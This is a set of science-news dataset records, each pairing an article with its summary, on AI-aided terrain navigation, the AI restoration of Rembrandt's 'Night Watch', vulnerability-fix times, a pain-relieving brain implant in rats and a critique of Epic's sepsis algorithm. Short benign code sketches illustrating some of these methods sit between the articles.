Visual terrain-relative navigation (VTRN) now can operate effectively regardless of seasonal changes, thanks to a new algorithm. California Institute of Technology researchers applied deep learning and artificial intelligence to eliminate seasonal content that can trip up VTRN systems, which rely on close similarity between the terrain they are looking at and database images. The algorithm utilizes self-supervised learning to educate itself, seeking patterns in images by parsing out details and properties that humans likely would overlook. VTRN systems equipped with the algorithm can localize more accurately: one upgraded system could match 92% of images of summer foliage against winter leaf-off imagery, with the remaining 8% easily addressed through other methods.
[]
[]
[]
scitechnews
None
None
None
None
Visual terrain-relative navigation (VTRN) now can operate effectively regardless of seasonal changes, thanks to a new algorithm. California Institute of Technology researchers applied deep learning and artificial intelligence to eliminate seasonal content that can trip up VTRN systems, which rely on close similarity between the terrain they are looking at and database images. The algorithm utilizes self-supervised learning to educate itself, seeking patterns in images by parsing out details and properties that humans likely would overlook. VTRN systems equipped with the algorithm can localize more accurately: one upgraded system could match 92% of images of summer foliage against winter leaf-off imagery, with the remaining 8% easily addressed through other methods. Deep learning makes visual terrain-relative navigation more practical. Without GPS, autonomous systems get lost easily. Now a new algorithm developed at Caltech allows autonomous systems to recognize where they are simply by looking at the terrain around them - and for the first time, the technology works regardless of seasonal changes to that terrain. Details about the process were published on June 23 in the journal Science Robotics, which is published by the American Association for the Advancement of Science (AAAS). The general process, known as visual terrain-relative navigation (VTRN), was first developed in the 1960s. By comparing nearby terrain to high-resolution satellite images, autonomous systems can locate themselves. The problem is that, in order for it to work, the current generation of VTRN requires that the terrain it is looking at closely matches the images in its database. Anything that alters or obscures the terrain, such as snow cover or fallen leaves, causes the images to not match up and fouls up the system. So, unless there is a database of the landscape images under every conceivable condition, VTRN systems can be easily confused. To overcome this challenge, a team from the lab of Soon-Jo Chung, Bren Professor of Aerospace and Control and Dynamical Systems and research scientist at JPL, which Caltech manages for NASA, turned to deep learning and artificial intelligence (AI) to remove seasonal content that hinders current VTRN systems. "The rule of thumb is that both images - the one from the satellite and the one from the autonomous vehicle - have to have identical content for current techniques to work. The differences that they can handle are about what can be accomplished with an Instagram filter that changes an image's hues," says Anthony Fragoso (MS '14, PhD '18), lecturer and staff scientist, and lead author of the Science Robotics paper. "In real systems, however, things change drastically based on season because the images no longer contain the same objects and cannot be directly compared." The process - developed by Chung and Fragoso in collaboration with graduate student Connor Lee (BS '17, MS '19) and undergraduate student Austin McCoy - uses what is known as "self-supervised learning." While most computer-vision strategies rely on human annotators who carefully curate large data sets to teach an algorithm how to recognize what it is seeing, this one instead lets the algorithm teach itself. The AI looks for patterns in images by teasing out details and features that would likely be missed by humans. 
Supplementing the current generation of VTRN with the new system yields more accurate localization: in one experiment, the researchers attempted to localize images of summer foliage against winter leaf-off imagery using a correlation-based VTRN technique. They found that performance was no better than a coin flip, with 50 percent of attempts resulting in navigation failures. In contrast, insertion of the new algorithm into the VTRN worked far better: 92 percent of attempts were correctly matched, and the remaining 8 percent could be identified as problematic in advance, and then easily managed using other established navigation techniques. "Computers can find obscure patterns that our eyes can't see and can pick up even the smallest trend," says Lee. VTRN was in danger of turning into an infeasible technology in common but challenging environments, he says. "We rescued decades of work in solving this problem." Beyond the utility for autonomous drones on Earth, the system also has applications for space missions. The entry, descent, and landing (EDL) system on JPL's Mars 2020 Perseverance rover mission, for example, used VTRN for the first time on the Red Planet to land at the Jezero Crater, a site that was previously considered too hazardous for a safe entry. With rovers such as Perseverance, "a certain amount of autonomous driving is necessary," Chung says, "since transmissions could take 20 minutes to travel between Earth and Mars, and there is no GPS on Mars." The team also considered the Martian polar regions, which have intense seasonal changes and conditions similar to Earth's; the new system could allow for improved navigation there to support scientific objectives, including the search for water. Next, Fragoso, Lee, and Chung will expand the technology to account for changes in the weather as well: fog, rain, snow, and so on. If successful, their work could help improve navigation systems for driverless cars. The Science Robotics paper is titled "A Seasonally-Invariant Deep Transform for Visual Terrain-Relative Navigation." This project was funded by the Boeing Company and the National Science Foundation. McCoy participated through Caltech's Summer Undergraduate Research Fellowship program.
207
Rembrandt's 'Night Watch' on Display with Missing Figures Restored by AI
AMSTERDAM, June 23 (Reuters) - For the first time in 300 years, Rembrandt's famed "The Night Watch" is back on display in what researchers say is its original size, with missing parts temporarily restored in an exhibition aided by artificial intelligence. Rembrandt finished the large canvas, which portrays the captain of an Amsterdam city militia ordering his men into action, in 1642. Although it is now considered one of the greatest masterpieces of the Dutch Golden Age, strips were cut from all four sides of it during a move in 1715. Though those strips have not been found, another artist of the time had made a copy, and restorers and computer scientists have used that, blended with Rembrandt's style, to recreate the missing parts. "It's never the real thing, but I think it gives you different insight into the composition," Rijksmuseum director Taco Dibbits said. The effect is a little like seeing a photo cropped as the photographer would have wanted. The central figure in the painting, Captain Frans Bannink Cocq, now appears more off-centre, as he was in Rembrandt's original version, making the work more dynamic. Some of the figure of a drummer entering the frame on the far right has been restored, as he marches onto the scene, prompting a dog to bark. Three restored figures that had been missing on the left, not highly detailed, are onlookers, not members of the militia. That was an effect Rembrandt intended, Dibbits said, to draw the viewer into the painting. Rijksmuseum Senior Scientist Robert Erdmann explained some of the steps in crafting the missing parts, which are hung to overlap the original work without touching it. First both "The Night Watch" and the much smaller copy, which is attributed to Gerrit Lundens and dated to around 1655, had to be carefully photographed. Then researchers scaled the images to the same size, and warped the Lundens work to fit better with the Rembrandt where there were minor differences in placement of figures and objects. The artificial intelligence software learned by trying millions of times to approximate Rembrandt's style and colours more closely. Humans judged the success. Erdmann said the result was good enough that the AI had "hallucinated" cracks in the paint in some spots as it translated the Lundens work into Rembrandt's style. But asked whether this is the best possible restoration of "The Night Watch," he said no. "I think technique will always be able to improve."
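The scaling and warping step described above is a standard image-registration problem, and a rough sketch of how it can be done is shown below. The file names are placeholders and the museum's actual pipeline, including the style-translation network that learned Rembrandt's colours, is not reproduced here; this only illustrates aligning a photographed copy to the original with feature matching and a homography.

# Rough sketch of the registration step: align a photographed copy to the
# original by matching features and warping with a homography. File names are
# placeholders; this is not the Rijksmuseum's actual pipeline.
import cv2
import numpy as np

original = cv2.imread("night_watch_original.png", cv2.IMREAD_GRAYSCALE)
copy = cv2.imread("lundens_copy.png", cv2.IMREAD_GRAYSCALE)

# Detect and describe keypoints in both images.
orb = cv2.ORB_create(5000)
kp1, des1 = orb.detectAndCompute(copy, None)
kp2, des2 = orb.detectAndCompute(original, None)

# Match descriptors and keep the strongest correspondences.
matcher = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)
matches = sorted(matcher.match(des1, des2), key=lambda m: m.distance)[:500]

src = np.float32([kp1[m.queryIdx].pt for m in matches]).reshape(-1, 1, 2)
dst = np.float32([kp2[m.trainIdx].pt for m in matches]).reshape(-1, 1, 2)

# Robustly estimate a homography and warp the copy onto the original's frame.
H, _ = cv2.findHomography(src, dst, cv2.RANSAC, 5.0)
aligned = cv2.warpPerspective(copy, H, (original.shape[1], original.shape[0]))
cv2.imwrite("lundens_copy_aligned.png", aligned)

Once the copy is registered to the original in this way, a learning-based model can be trained on the overlapping regions to translate the copy's rendering toward the original's style before the missing margins are synthesized.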
Researchers at the Rijksmuseum in the Netherlands used artificial intelligence to restore missing parts of Rembrandt's "The Night Watch" for a new exhibit. This marks the first time in 300 years that the 1642 painting is on display in its original size. Strips that were cut from all four sides of the painting during a 1715 move and later lost were recreated by restorers and computer scientists with the help of a copy made by another artist of the time. Images of the original painting and the smaller 1655 copy attributed to Gerrit Lundens were scaled to the same size, with the Lundens work warped to fit with the Rembrandt where the placement of figures and objects slightly differed.
[]
[]
[]
scitechnews
None
None
None
None
Researchers at the Rijksmuseum in the Netherlands used artificial intelligence to restore missing parts of Rembrandt's "The Night Watch" for a new exhibit. This marks the first time in 300 years that the 1642 painting is on display in its original size. Strips that were cut from all four sides of the painting during a 1715 move and later lost were recreated by restorers and computer scientists with the help of a copy made by another artist of the time. Images of the original painting and the smaller 1655 copy attributed to Gerrit Lundens were scaled to the same size, with the Lundens work warped to fit with the Rembrandt where the placement of figures and objects slightly differed. AMSTERDAM, June 23 (Reuters) - For the first time in 300 years, Rembrandt's famed "The Night Watch" is back on display in what researchers say is its original size, with missing parts temporarily restored in an exhibition aided by artificial intelligence. Rembrandt finished the large canvas, which portrays the captain of an Amsterdam city militia ordering his men into action, in 1642. Although it is now considered one of the greatest masterpieces of the Dutch Golden Age, strips were cut from all four sides of it during a move in 1715. Though those strips have not been found, another artist of the time had made a copy, and restorers and computer scientists have used that, blended with Rembrandt's style, to recreate the missing parts. "It's never the real thing, but I think it gives you different insight into the composition," Rijksmuseum director Taco Dibbits said. The effect is a little like seeing a photo cropped as the photographer would have wanted. The central figure in the painting, Captain Frans Bannink Cocq, now appears more off-centre, as he was in Rembrandt's original version, making the work more dynamic. Some of the figure of a drummer entering the frame on the far right has been restored, as he marches onto the scene, prompting a dog to bark. Three restored figures that had been missing on the left, not highly detailed, are onlookers, not members of the militia. That was an effect Rembrandt intended, Dibbits said, to draw the viewer into the painting. Rijksmuseum Senior Scientist Robert Erdmann explained some of the steps in crafting the missing parts, which are hung to overlap the original work without touching it. First both "The Night Watch" and the much smaller copy, which is attributed to Gerrit Lundens and dated to around 1655, had to be carefully photographed. Then researchers scaled the images to the same size, and warped the Lundens work to fit better with the Rembrandt where there were minor differences in placement of figures and objects. The artificial intelligence software learned by trying millions of times to approximate Rembrandt's style and colours more closely. Humans judged the success. Erdmann said the result was good enough that the AI had "hallucinated" cracks in the paint in some spots as it translated the Lundens work into Rembrandt's style. But asked whether this is the best possible restoration of "The Night Watch," he said no. "I think technique will always be able to improve."
208
Average Time to Fix Critical Cybersecurity Vulnerabilities is 205 Days: Report
A new report from WhiteHat Security has found that the average time taken to fix critical cybersecurity vulnerabilities has increased from 197 days in April 2021 to 205 days in May 2021. In its AppSec Stats Flash report, WhiteHat Security researchers found that organizations in the utility sector had the highest exposure window with their application vulnerabilities, spotlighting a problem that made national news last week when it was revealed more than 50,000 water treatment plants across the US had lackluster cybersecurity. In addition to an attack on a water treatment plant in Florida earlier this year, it was revealed that there had been multiple attacks on utilities that were never reported. According to the report, more than 66% of all applications used by the utility sector had at least one exploitable vulnerability open throughout the year. Setu Kulkarni, a vice president at WhiteHat Security, said over 60% of applications in the manufacturing industry also had a window of exposure of over 365 days. "At the same time, they have a very small number of applications that have a window of exposure that is less than 30 days -- meaning applications where exploitable serious vulnerabilities get fixed under a month," Kulkarni explained, noting that the finance and insurance industries did a better job of addressing vulnerabilities. "Finance has a much more balanced window of exposure outlook. About 40% of applications have a WoE of 365 days, but about 30% have a WoE of fewer than 30 days." WhiteHat Security researchers said the top five vulnerability classes seen over the last three months include information leakage, insufficient session expiration, cross-site scripting, insufficient transport layer protection and content spoofing. The report notes that many of these vulnerabilities are "pedestrian" and require little effort or skill to discover and exploit. Kulkarni said the company decided to switch from releasing the report annually to publishing it monthly due to the sheer number of new applications that are developed, changed and deployed, especially since the onset of the COVID-19 pandemic . The threat landscape has also evolved and expanded alongside the explosion in application development. Kulkarni noted that the situation had spotlighted the lack of cybersecurity talent available to most organizations and the general lack of resources for many industries struggling to manage updates and patches for hundreds of applications. "We look at the window of exposure by the industry as a bellwether metric for breach exposure. When you look at industries like utilities or manufacturing that have been laggards in digital transformation when compared to finance and healthcare, we find that they have a window of exposure data in a complete disbalance," Kulkarni told ZDNet . "The key takeaway from this data is that organizations that are able to adapt their AppSec program to cater to the needs of legacy and new applications fare much better at balancing the window of exposure for their applications. That is what I am calling it two-speed AppSec: focusing on production testing and mitigation for legacy applications; focusing on production and pre-production testing and balancing mitigation as well as remediation for newer applications." Every application today is internet-connected either directly or indirectly, Kulkarni added, explaining that this means the impact of vulnerabilities can potentially affect hundreds of thousands of end-users, if not millions. 
Kulkarni suggested organizations distribute the responsibility of security more broadly to all the stakeholders beyond just security and IT teams that often lack the budget or the resources to handle security meticulously. "Security is a team sport, and for the longest time, there has been a disproportionate share of responsibility placed on security and IT teams. "Development teams are pressed for time, and they are in no position to undergo multiple hours of point-in-time dedicated security training. A better approach is for the security teams to identify the top 1-3 vulnerabilities that are trending in the applications they are testing and provide development teams bite-size training focused on those vulnerabilities."
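The "window of exposure" figures quoted above can be pictured with a small back-of-the-envelope tally: for each application, count the days in the year on which at least one serious vulnerability was open, then bucket applications by that count. The sketch below is illustrative only; the field names, thresholds, and buckets are assumptions, not WhiteHat's actual methodology.

# Back-of-the-envelope "window of exposure" tally. For each application,
# count days in the year with at least one serious vulnerability open, then
# bucket the applications. Illustrative only; not WhiteHat's methodology.
from datetime import date, timedelta

def days_exposed(findings, year=2021):
    """findings: list of (opened: date, closed: date or None) for one app."""
    start, end = date(year, 1, 1), date(year, 12, 31)
    exposed = set()
    for opened, closed in findings:
        lo = max(opened, start)
        hi = min(closed or end, end)
        day = lo
        while day <= hi:
            exposed.add(day)
            day += timedelta(days=1)
    return len(exposed)

def bucket_apps(apps):
    """apps: dict of app name -> findings list; returns exposure buckets."""
    counts = {"under 30 days": 0, "30-364 days": 0, "365 days": 0}
    for findings in apps.values():
        n = days_exposed(findings)
        if n < 30:
            counts["under 30 days"] += 1
        elif n < 365:
            counts["30-364 days"] += 1
        else:
            counts["365 days"] += 1
    return counts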
Software security adviser WhiteHat Security has estimated that the average time to correct critical cybersecurity vulnerabilities increased from 197 days to 205 days between April and May 2021. WhiteHat researchers determined that 66% of all apps used by the utility sector had at least one exploitable bug exposed throughout the year. The top five vulnerability classes WhiteHat researchers observed over the last three months were information leakage, insufficient session expiration, cross-site scripting, insufficient transport layer protection, and content spoofing; many such bugs also can be found and leveraged with little skill or effort. WhiteHat's Setu Kulkarni said the situation highlights a dearth of cybersecurity talent available to most organizations, and an overall scarcity of resources for many sectors wrestling with updates and patches for numerous apps.
[]
[]
[]
scitechnews
None
None
None
None
Software security adviser WhiteHat Security has estimated that the average time to correct critical cybersecurity vulnerabilities increased from 197 days to 205 days between April and May 2021. WhiteHat researchers determined that 66% of all apps used by the utility sector had at least one exploitable bug exposed throughout the year. The top five vulnerability classes WhiteHat researchers observed over the last three months were information leakage, insufficient session expiration, cross-site scripting, insufficient transport layer protection, and content spoofing; many such bugs also can be found and leveraged with little skill or effort. WhiteHat's Setu Kulkarni said the situation highlights a dearth of cybersecurity talent available to most organizations, and an overall scarcity of resources for many sectors wrestling with updates and patches for numerous apps. A new report from WhiteHat Security has found that the average time taken to fix critical cybersecurity vulnerabilities has increased from 197 days in April 2021 to 205 days in May 2021. In its AppSec Stats Flash report, WhiteHat Security researchers found that organizations in the utility sector had the highest exposure window with their application vulnerabilities, spotlighting a problem that made national news last week when it was revealed more than 50,000 water treatment plants across the US had lackluster cybersecurity. In addition to an attack on a water treatment plant in Florida earlier this year, it was revealed that there had been multiple attacks on utilities that were never reported. According to the report, more than 66% of all applications used by the utility sector had at least one exploitable vulnerability open throughout the year. Setu Kulkarni, a vice president at WhiteHat Security, said over 60% of applications in the manufacturing industry also had a window of exposure of over 365 days. "At the same time, they have a very small number of applications that have a window of exposure that is less than 30 days -- meaning applications where exploitable serious vulnerabilities get fixed under a month," Kulkarni explained, noting that the finance and insurance industries did a better job of addressing vulnerabilities. "Finance has a much more balanced window of exposure outlook. About 40% of applications have a WoE of 365 days, but about 30% have a WoE of fewer than 30 days." WhiteHat Security researchers said the top five vulnerability classes seen over the last three months include information leakage, insufficient session expiration, cross-site scripting, insufficient transport layer protection and content spoofing. The report notes that many of these vulnerabilities are "pedestrian" and require little effort or skill to discover and exploit. Kulkarni said the company decided to switch from releasing the report annually to publishing it monthly due to the sheer number of new applications that are developed, changed and deployed, especially since the onset of the COVID-19 pandemic . The threat landscape has also evolved and expanded alongside the explosion in application development. Kulkarni noted that the situation had spotlighted the lack of cybersecurity talent available to most organizations and the general lack of resources for many industries struggling to manage updates and patches for hundreds of applications. "We look at the window of exposure by the industry as a bellwether metric for breach exposure. 
When you look at industries like utilities or manufacturing that have been laggards in digital transformation when compared to finance and healthcare, we find that they have a window of exposure data in a complete disbalance," Kulkarni told ZDNet . "The key takeaway from this data is that organizations that are able to adapt their AppSec program to cater to the needs of legacy and new applications fare much better at balancing the window of exposure for their applications. That is what I am calling it two-speed AppSec: focusing on production testing and mitigation for legacy applications; focusing on production and pre-production testing and balancing mitigation as well as remediation for newer applications." Every application today is internet-connected either directly or indirectly, Kulkarni added, explaining that this means the impact of vulnerabilities can potentially affect hundreds of thousands of end-users, if not millions. Kulkarni suggested organizations distribute the responsibility of security more broadly to all the stakeholders beyond just security and IT teams that often lack the budget or the resources to handle security meticulously. "Security is a team sport, and for the longest time, there has been a disproportionate share of responsibility placed on security and IT teams. "Development teams are pressed for time, and they are in no position to undergo multiple hours of point-in-time dedicated security training. A better approach is for the security teams to identify the top 1-3 vulnerabilities that are trending in the applications they are testing and provide development teams bite-size training focused on those vulnerabilities."
209
Implantable Brain Device Relieves Pain in Early Study
A computerized brain implant effectively relieves short-term and chronic pain in rodents, a new study finds. The experiments, conducted by investigators at NYU Grossman School of Medicine, offer what the researchers call a "blueprint" for the development of brain implants to treat pain syndromes and other brain-based disorders, such as anxiety , depression , and panic attacks. Published June 21 in the journal Nature Biomedical Engineering , the study showed that device-implanted rats withdrew their paws 40 percent more slowly from sudden pain compared with times when their device was turned off. According to the study authors, this suggests that the device reduced the intensity of the pain the rodents experienced. In addition, animals in sudden or continuous pain spent about two-thirds more time in a chamber where the computer-controlled device was turned on than in a chamber where it was not. Researchers say the investigation is the first to use a computerized brain implant to detect and relieve bursts of pain in real time. The device is also the first of its kind to target chronic pain, which often occurs without being prompted by a known trigger, the study authors say. "Our findings show that this implant offers an effective strategy for pain therapy, even in cases where symptoms are traditionally difficult to pinpoint or manage," says senior study author Jing Wang, MD, PhD , the Valentino D.B. Mazzia, MD, JD, Associate Professor and the vice chair for clinical and translational research in the Department of Anesthesiology, Perioperative Care, and Pain Medicine at NYU Langone. Chronic pain is estimated to affect one in four adults in the United States, yet until now, safe and reliable treatments have proven elusive, says Dr. Wang, who is also director of NYU Langone's Interdisciplinary Pain Research Program . Particularly for pain that keeps coming back, current therapies such as opioids often grow less effective over time as people become desensitized to the treatment. In addition, drugs such as opioids activate the reward centers of the brain to create feelings of pleasure that may lead to addiction . Computerized brain implants, previously investigated to prevent epileptic seizures and control prosthetic devices, may avert many of these issues, says Dr. Wang. The technology, known as a closed-loop brain-machine interface, detects brain activity in the anterior cingulate cortex, a region of the brain that is critical for pain processing. A computer linked to the device then automatically identifies electrical patterns in the brain closely linked to pain. When signs of pain are detected, the computer triggers therapeutic stimulation of another region of the brain, the prefrontal cortex, to ease it. Since the device is only activated in the presence of pain, Dr. Wang says, it lessens the risk of overuse and any potential for tolerance to develop. Furthermore, because the implant offers no reward beyond pain relief, as opioids do, the risk of addiction is minimized. As part of the study, the researchers installed tiny electrodes in the brains of dozens of rats and then exposed them to carefully measured amounts of pain. The animals were closely monitored for how quickly they moved away from the pain source. This allowed the investigators to track how often the device correctly identified pain-based brain activity in the anterior cingulate cortex and how effectively it could lessen the resulting sensation. 
According to the study authors, the implant accurately detected pain up to 80 percent of the time. "Our results demonstrate that this device may help researchers better understand how pain works in the brain," says lead study investigator Qiaosheng Zhang, PhD, a doctoral fellow in the Department of Anesthesiology, Perioperative Care, and Pain Medicine at NYU Langone. "Moreover, it may allow us to find non-drug therapies for other neuropsychiatric disorders, such as anxiety, depression, and post-traumatic stress." Dr. Zhang adds that the implant's pain detection properties could be improved by installing electrodes in other regions of the brain beyond the anterior cingulate cortex. He cautions, however, that the technology is not yet suitable for use in people, but says plans are underway to investigate less invasive forms with potential to be adapted for human use. Funding for the study was provided by National Institutes of Health grants R01 NS100065, R01 GM115384, and R01 MH118928, and National Science Foundation grant CBET 1835000. In addition to Dr. Wang and Dr. Zhang, other NYU Langone researchers were Sile Hu, MS; Robert Talay; Amrita Singh, BA; Bassir Caravan, BS; Zhengdong Xiao, MS; David Rosenberg, BS; Anna Li, BM; Johnathan D. Gould; Yaling Liu; Guanghao Sun; and Zhe S. Chen, PhD.
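The closed-loop logic described above, detect a pain-associated pattern in anterior cingulate cortex (ACC) activity and only then stimulate the prefrontal cortex (PFC), can be outlined in a few lines. The sketch below is conceptual: the decoder, the hardware interfaces (read_acc_window, stimulate_pfc), the threshold, and the timing constants are all placeholders, not the implementation used in the study.

# Conceptual sketch of a closed-loop detect-and-stimulate cycle. The decoder
# and hardware interfaces are placeholders; this mirrors the idea of the
# interface described above, not the actual device firmware.
import time

WINDOW_S = 0.5        # length of each ACC recording window, in seconds
REFRACTORY_S = 2.0    # minimum gap between stimulation bursts

def closed_loop(read_acc_window, pain_decoder, stimulate_pfc, threshold=0.8):
    """read_acc_window() -> raw ACC samples for one window;
    pain_decoder(samples) -> pain probability in [0, 1];
    stimulate_pfc(duration_s) delivers a stimulation burst."""
    last_stim = -REFRACTORY_S
    while True:
        samples = read_acc_window()          # acquire WINDOW_S of ACC data
        p_pain = pain_decoder(samples)       # decode pain probability
        now = time.monotonic()
        if p_pain >= threshold and now - last_stim >= REFRACTORY_S:
            stimulate_pfc(duration_s=1.0)    # stimulate only when pain is detected
            last_stim = now
        time.sleep(WINDOW_S)

The point of gating stimulation on detection, as the article notes, is that the system acts only in the presence of pain, which is what limits overuse and tolerance compared with continuous therapies.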
Experiments by New York University (NYU) Langone scientists demonstrated a computerized brain implant's ability to relieve short-term and chronic pain in rodents. The closed-loop brain-machine interface identifies activity in the anterior cingulate cortex, an area of the brain essential for pain processing; when a computer connected to the implant automatically detects electrical patterns closely associated with pain, it directs the implant to relieve it by stimulating the prefrontal cortex. The NYU Langone researchers implanted electrodes in the brains of dozens of rats, then exposed them to carefully measured amounts of pain, monitoring for how fast they withdrew from the pain source. The researchers said the device accurately detected pain up to 80% of the time.
[]
[]
[]
scitechnews
None
None
None
None
Experiments by New York University (NYU) Langone scientists demonstrated a computerized brain implant's ability to relieve short-term and chronic pain in rodents. The closed-loop brain-machine interface identifies activity in the anterior cingulate cortex, an area of the brain essential for pain processing; when a computer connected to the implant automatically detects electrical patterns closely associated with pain, it directs the implant to relieve it by stimulating the prefrontal cortex. The NYU Langone researchers implanted electrodes in the brains of dozens of rats, then exposed them to carefully measured amounts of pain, monitoring for how fast they withdrew from the pain source. The researchers said the device accurately detected pain up to 80% of the time. A computerized brain implant effectively relieves short-term and chronic pain in rodents, a new study finds. The experiments, conducted by investigators at NYU Grossman School of Medicine, offer what the researchers call a "blueprint" for the development of brain implants to treat pain syndromes and other brain-based disorders, such as anxiety , depression , and panic attacks. Published June 21 in the journal Nature Biomedical Engineering , the study showed that device-implanted rats withdrew their paws 40 percent more slowly from sudden pain compared with times when their device was turned off. According to the study authors, this suggests that the device reduced the intensity of the pain the rodents experienced. In addition, animals in sudden or continuous pain spent about two-thirds more time in a chamber where the computer-controlled device was turned on than in a chamber where it was not. Researchers say the investigation is the first to use a computerized brain implant to detect and relieve bursts of pain in real time. The device is also the first of its kind to target chronic pain, which often occurs without being prompted by a known trigger, the study authors say. "Our findings show that this implant offers an effective strategy for pain therapy, even in cases where symptoms are traditionally difficult to pinpoint or manage," says senior study author Jing Wang, MD, PhD , the Valentino D.B. Mazzia, MD, JD, Associate Professor and the vice chair for clinical and translational research in the Department of Anesthesiology, Perioperative Care, and Pain Medicine at NYU Langone. Chronic pain is estimated to affect one in four adults in the United States, yet until now, safe and reliable treatments have proven elusive, says Dr. Wang, who is also director of NYU Langone's Interdisciplinary Pain Research Program . Particularly for pain that keeps coming back, current therapies such as opioids often grow less effective over time as people become desensitized to the treatment. In addition, drugs such as opioids activate the reward centers of the brain to create feelings of pleasure that may lead to addiction . Computerized brain implants, previously investigated to prevent epileptic seizures and control prosthetic devices, may avert many of these issues, says Dr. Wang. The technology, known as a closed-loop brain-machine interface, detects brain activity in the anterior cingulate cortex, a region of the brain that is critical for pain processing. A computer linked to the device then automatically identifies electrical patterns in the brain closely linked to pain. When signs of pain are detected, the computer triggers therapeutic stimulation of another region of the brain, the prefrontal cortex, to ease it. 
Since the device is only activated in the presence of pain, Dr. Wang says, it lessens the risk of overuse and any potential for tolerance to develop. Furthermore, because the implant offers no reward beyond pain relief, as opioids do, the risk of addiction is minimized. As part of the study, the researchers installed tiny electrodes in the brains of dozens of rats and then exposed them to carefully measured amounts of pain. The animals were closely monitored for how quickly they moved away from the pain source. This allowed the investigators to track how often the device correctly identified pain-based brain activity in the anterior cingulate cortex and how effectively it could lessen the resulting sensation. According to the study authors, the implant accurately detected pain up to 80 percent of the time. "Our results demonstrate that this device may help researchers better understand how pain works in the brain," says lead study investigator Qiaosheng Zhang, PhD, a doctoral fellow in the Department of Anesthesiology, Perioperative Care, and Pain Medicine at NYU Langone. "Moreover, it may allow us to find non-drug therapies for other neuropsychiatric disorders, such as anxiety, depression, and post-traumatic stress." Dr. Zhang adds that the implant's pain detection properties could be improved by installing electrodes in other regions of the brain beyond the anterior cingulate cortex. He cautions, however, that the technology is not yet suitable for use in people, but says plans are underway to investigate less invasive forms with potential to be adapted for human use. Funding for the study was provided by National Institutes of Health grants R01 NS100065, R01 GM115384, and R01 MH118928, and National Science Foundation grant CBET 1835000. In addition to Dr. Wang and Dr. Zhang, other NYU Langone researchers were Sile Hu, MS; Robert Talay; Amrita Singh, BA; Bassir Caravan, BS; Zhengdong Xiao, MS; David Rosenberg, BS; Anna Li, BM; Johnathan D. Gould; Yaling Liu; Guanghao Sun; and Zhe S. Chen, PhD.
212
Algorithm That Predicts Deadly Infections Is Often Flawed
A complication of infection known as sepsis is the number one killer in US hospitals. So it's not surprising that more than 100 health systems use an early warning system offered by Epic Systems, the dominant provider of US electronic health records. The system throws up alerts based on a proprietary formula tirelessly watching for signs of the condition in a patient's test results. But a new study using data from nearly 30,000 patients in University of Michigan hospitals suggests Epic's system performs poorly. The authors say it missed two-thirds of sepsis cases, rarely found cases medical staff did not notice, and frequently issued false alarms. Karandeep Singh, an assistant professor at University of Michigan who led the study, says the findings illustrate a broader problem with the proprietary algorithms increasingly used in health care. "They're very widely used, and yet there's very little published on these models," Singh says. "To me that's shocking." The study was published Monday in JAMA Internal Medicine . An Epic spokesperson disputed the study's conclusions, saying the company's system has "helped clinicians save thousands of lives." Epic's is not the first widely used health algorithm to trigger concerns that technology supposed to improve health care is not delivering, or even actively harmful. In 2019, a system used on millions of patients to prioritize access to special care for people with complex needs was found to lowball the needs of Black patients compared to white patients. That prompted some Democratic senators to ask federal regulators to investigate bias in health algorithms. A study published in April found that statistical models used to predict suicide risk in mental health patients performed well for white and Asian patients but poorly for Black patients. The way sepsis stalks hospital wards has made it a special target of algorithmic aids for medical staff. Guidelines from the Centers for Disease Control and Prevention to health providers on sepsis encourage use of electronic medical records for surveillance and predictions. Epic has several competitors offering commercial warning systems, and some US research hospitals have built their own tools . Automated sepsis warnings have huge potential, Singh says, because key symptoms of the condition, such as low blood pressure, can have other causes, making it difficult for staff to spot early. Starting sepsis treatment such as antibiotics just an hour sooner can make a big difference to patient survival. Hospital administrators often take special interest in sepsis response, in part because it contributes to US government hospital ratings . Singh runs a lab at Michigan researching applications of machine learning to patient care. He got curious about Epic's sepsis warning system after being asked to chair a committee at the university's health system created to oversee uses of machine learning. As Singh learned more about the tools in use at Michigan and other health systems, he became concerned that they mostly came from vendors that disclosed little about how they worked or performed. His own system had a license to use Epic's sepsis prediction model, which the company told customers was highly accurate. But there had been no independent validation of its performance. Singh and Michigan colleagues tested Epic's prediction model on records for nearly 30,000 patients covering almost 40,000 hospitalizations in 2018 and 2019. 
The researchers noted how often Epic's algorithm flagged people who developed sepsis as defined by the CDC and the Centers for Medicare and Medicaid Services. And they compared the alerts that the system would have triggered with sepsis treatments logged by staff, who did not see Epic sepsis alerts for patients included in the study. The researchers say their results suggest Epic's system wouldn't make a hospital much better at catching sepsis and could burden staff with unnecessary alerts. The company's algorithm did not identify two-thirds of the roughly 2,500 sepsis cases in the Michigan data. It would have alerted for 183 patients who developed sepsis but had not been given timely treatment by staff.
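A retrospective evaluation of this kind boils down to comparing model alerts against labeled hospitalizations and computing sensitivity, positive predictive value, and the number of alerts fired per true case caught. The sketch below illustrates that bookkeeping; the column names, score threshold, and data layout are assumptions for illustration, not the study's analysis code or Epic's scoring.

# Illustrative retrospective evaluation of an alert model against labeled
# hospitalizations. Column names and the threshold are assumptions; this is
# not the study's analysis code.
import pandas as pd

def evaluate_alerts(df: pd.DataFrame, score_col="alert_score", threshold=6.0):
    """df has one row per hospitalization, with `score_col` holding the
    model's output and a boolean `sepsis` label from chart-based criteria."""
    alerted = df[score_col] >= threshold
    tp = int((alerted & df["sepsis"]).sum())    # alerted, truly septic
    fp = int((alerted & ~df["sepsis"]).sum())   # alerted, not septic
    fn = int((~alerted & df["sepsis"]).sum())   # missed sepsis cases
    sensitivity = tp / (tp + fn) if tp + fn else float("nan")
    ppv = tp / (tp + fp) if tp + fp else float("nan")
    alerts_per_case = (tp + fp) / tp if tp else float("inf")
    return {"sensitivity": sensitivity,
            "ppv": ppv,
            "alerts_per_true_case_caught": alerts_per_case}

Framing the results this way is what lets the authors weigh the alerts a hospital would have to field against the additional cases the tool would actually surface.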
An algorithm designed by U.S. electronic health record provider Epic Systems to forecast sepsis infections is significantly lacking in accuracy, according to an analysis of data on about 30,000 patients in University of Michigan (U-M) hospitals. U-M researchers said the program overlooked two-thirds of the approximately 2,500 sepsis cases in the data, rarely detected cases missed by medical staff, and was prone to false alarms. The researchers said Epic tells customers its sepsis alert system can correctly differentiate two patients with and without sepsis with at least 76% accuracy, but they determined it was only 63% accurate. U-M's Karandeep Singh said the study highlights wider shortcomings with proprietary algorithms increasingly used in healthcare, noting that the lack of published science on these models is "shocking."
[]
[]
[]
scitechnews
None
None
None
None
